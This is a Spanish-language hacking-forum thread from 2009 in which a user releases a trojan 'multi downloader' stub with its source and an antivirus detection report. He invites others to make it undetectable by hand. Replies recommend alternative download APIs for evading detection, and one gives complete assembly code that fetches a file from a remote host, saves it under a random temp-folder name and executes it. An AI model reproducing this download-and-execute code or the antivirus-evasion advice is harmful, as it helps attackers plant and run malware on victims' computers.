elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
21 Mayo 2012, 13:53  


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderadores: Karcrack, [Zero])
| | |-+  Cannabis Multi Downloader v1.0 + Source		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Cannabis Multi Downloader v1.0 + Source  (Leído 10,530 veces)
shark0

Desconectado Desconectado

Mensajes: 195



Ver Perfil WWW
Cannabis Multi Downloader v1.0 + Source
« en: 23 Agosto 2009, 00:21 »
Bueno este tampoco es el proyecto secreto :laugh:, estaba aburrido y me puse a hacer un multi downloader, peso del stub : 12 kb, es bastante detectado y facil de indetectarlo, podía haber usado el modulo de CallApiByName de cobein y hubieran salido bastantes pero eso es subir bastante el peso, asi que prefiero que lo indetecten a mano, también dejo el source.



File Info

Report generated: 23.8.2009 at 0.10.06 (GMT 1)
Filename: Stub.exe
File size: 12 KB
MD5 Hash: 16c453ad80a804e3497af5da6c60a459
SHA1 Hash: 479356BE3EFF0EC5254281332EC3CF57BB1F3F4F
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection rate: 5 on 22

Detections

a-squared - -
Avira AntiVir - TR/VB.Downloader.Gen
Avast - -
AVG - Dropper.Heliosb.N
BitDefender - Gen:Trojan.Heur.am0@f9ueMwK
ClamAV - -
Comodo - -
Dr.Web - Trojan.DownLoad.37264
Ewido - -
F-PROT6 - W32/VB-Downloader-Minimi-based!Maximus
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 v3 - -
Norman - -
Panda - -
QuickHeal - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - -
VirusBuster - -

Scan report generated by
NoVirusThanks.org

Descargar binario
Descargar source

Saludos!  :D
« Última modificación: 23 Agosto 2009, 02:20 por Sharki » En línea

Edge of Madness
seba123neo


Desconectado Desconectado

Mensajes: 3.209



Ver Perfil WWW
Re: Cannabis Multi Downloader v1.0 + Source
« Respuesta #1 en: 23 Agosto 2009, 03:01 »
Hola, proba no usar la api que estas usando para descargar y fijate, porque esa api es bastante detectada...

saludos.
En línea
Mucha gente, especialmente la ignorante desea castigarte por decir la verdad, por ser correcto, por ser tú. Nunca te disculpes por ser correcto, o por estar años delante de tu tiempo.
Si estas en lo cierto, y lo sabes, que hable tu razón. Incluso si eres una minoria de uno solo, la verdad sigue siendo la verdad. M. Gandhi
shark0

Desconectado Desconectado

Mensajes: 195



Ver Perfil WWW
Re: Cannabis Multi Downloader v1.0 + Source
« Respuesta #2 en: 23 Agosto 2009, 12:51 »
Si, también podria usar MSINET pero alguna otra alternativa?.

Saludos! ;D
En línea

Edge of Madness
Karcrack
Moderador
***
Desconectado Desconectado

Mensajes: 2.186


Se siente observado ¬¬'


Ver Perfil
Re: Cannabis Multi Downloader v1.0 + Source
« Respuesta #3 en: 23 Agosto 2009, 12:57 »
Cita de: Sharki en 23 Agosto 2009, 12:51
Si, también podria usar MSINET pero alguna otra alternativa?.

Saludos! ;D

WinHTTP
Internet* APIs

 :rolleyes: Y muchos mas :xD
Te lo añado a la biblioteca...
En línea
YST


Desconectado Desconectado

Mensajes: 963


I'm you


Ver Perfil WWW
Re: Cannabis Multi Downloader v1.0 + Source
« Respuesta #4 en: 24 Agosto 2009, 00:14 »
Cita de: Sharki en 23 Agosto 2009, 12:51
Si, también podria usar MSINET pero alguna otra alternativa?.

Saludos! ;D

Sockets :D

Un ejemplo en ASM  ;)

Código
proc DownloadToFile,pHost,pFile  ;Funcion que descarga un archivo.
locals
c dd ?
lRuta rb MAX_PATH
lHandle dd ?
lWD WSADATA
lSocket dd ?
lSin sockaddr_in
lCabezeras rb 800
lBuffer rb 800
bwrite dd ?
endl
invoke WSAStartup,200,addr lWD
invoke socket,AF_INET,SOCK_STREAM,0
 
mov [lSocket],eax
.Reintentar :
invoke Sleep,100
invoke gethostbyname ,[pHost]
cmp eax,0
je  .Reintentar
virtual at eax
.host   hostent
end     virtual
mov     eax,[.host.h_addr_list]
mov     eax,[eax]
mov     eax,[eax]
mov [lSin.sin_addr],eax
stdcall HTONS,80
mov [lSin.sin_family],2
mov [lSin.sin_port],ax
.BucleConectar: ;Bucle para conectarse
 
invoke connect,[lSocket],addr lSin,16
cmp eax, -1
JE .BucleConectar
stdcall  DetectaExtención,[pFile]
mov esi,eax
invoke GetTempPath,MAX_PATH,addr lRuta
stdcall Len,addr lRuta
lea edi,[lRuta]
add edi,eax
mov byte[edi],"\"
inc edi
RDTSC
invoke wsprintf,edi,"%x.%s",eax,esi
        invoke CreateFileA,addr lRuta , 40000000h, 0, 0, 2, 0, 0  ;Creamos el archivo
                cmp    eax,INVALID_HANDLE_VALUE
        je     .exit
        mov [lHandle],eax
invoke wsprintf,addr lCabezeras,cabezeras ,0,[pFile],[pHost]
 
invoke send, [lSocket],addr lCabezeras,<stdcall Len,addr lCabezeras>,0
.bucle:
invoke recv,[lSocket],addr lBuffer,500,0
mov ebx,eax
 mov [c],eax
lea esi,[lBuffer]
mov di,word[Espacio]
cmp dword[esi],"HTTP"
jne .saeguir
.bucle_:
inc esi
dec ebx
cmp word[esi],di
jne .bucle_
cmp word[esi+2],di
jne .bucle_
sub ebx,4
add esi,4
 
.saeguir:
 
 
   invoke WriteFile,[lHandle],esi,ebx,addr bwrite,0 ;Escribimos el archivo
cmp [c],0
jne  .bucle
invoke CloseHandle,[lHandle]
    invoke ShellExecute,0, "Open", addr lRuta ,0, 0, 1
 
 .exit:
ret
 
 
endp
;===========================================================================================================================
;===========================================================================================================================
proc ProcesarURL,pURL
locals
lFile dd ?
endl
mov ebx,[pURL]
.if dword[ebx] = "http" | dword[ebx] = "HTTP"
add ebx,7
.endif
mov edi,ebx
.bucle:
inc edi
.if byte[edi] = "\" |   byte[edi] = "/"
.else
jmp .bucle
.endif
 
stdcall Len,edi
invoke GlobalAlloc,GPTR, eax
mov [lFile],eax
 
stdcall STRCopy,eax,edi
mov byte[edi],0
stdcall DownloadToFile,ebx,[lFile]
invoke GlobalFree, [lFile]
ret
endp
 cabezeras:
               db  "GET %s%s HTTP/1.1",13,10
               db  "Host: %s",13,10
               db  "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10",13,10
               db  "Connection: close",13,10,13,10,0  
 
« Última modificación: 24 Agosto 2009, 00:21 por YST » En línea


Yo le enseñe a Kayser a usar objetos en ASM
mojolloyo20

Desconectado Desconectado

Mensajes: 208


en esta vida nunca te acostaras sin saber nada nue


Ver Perfil WWW
Re: Cannabis Multi Downloader v1.0 + Source
« Respuesta #5 en: 1 Septiembre 2009, 03:35 »
unnn esta interesante,otro que se aburre y piensa como yop  ;D ( aun que no suelo acabar lo que empiezo jajaja)

hacer timer se me paso hacer un webloader de marihuana que me descargara un archivo desde url y tal,lo unico que no sabia hacer digamos el stub. asin que no termine.

y luego pense en hacer uno = pero que bajara varios archivos,pero tenia una liada que te cagas.

me ficho por aki pa variar y cuando tenga mas timer le ojeo mejor.

un salu2

p.d: se me olvidaba yo uson URLDownloadToFile Lib "urlmon" _ por agregar algo +
En línea
Lo reconozco
fumo porros a diario
me fumo uno y es como poner la radio
pero por dentro de mi amarga cabeza
siempre tan sola y tan llena de tristeza
Me salen la s canciones que a mí más me molan
las musiquillas que ha mí más me motivan
las amarguras se vuelven amapolas
y las tristezas me alegran la vida
Anda dame que fume
porque me siento sólo
dame de fumar
porque no quiero estar triste
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines